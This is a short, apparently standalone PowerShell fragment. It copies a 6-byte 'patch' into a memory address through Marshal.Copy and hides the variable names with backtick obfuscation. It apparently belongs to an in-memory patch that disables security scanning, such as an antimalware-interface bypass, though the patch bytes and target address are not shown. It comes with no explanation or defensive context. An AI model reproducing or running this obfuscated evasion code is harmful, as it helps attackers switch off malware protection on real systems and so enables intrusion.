$namespace = [System.Runtime.InteropServices.Marshal] $method = 'Copy' $source = ${PaT`Ch} $startIndex = 0 $destination = ${addr`E`ss} $length = 6 $namespace::$method($source, $startIndex, $destination, $length)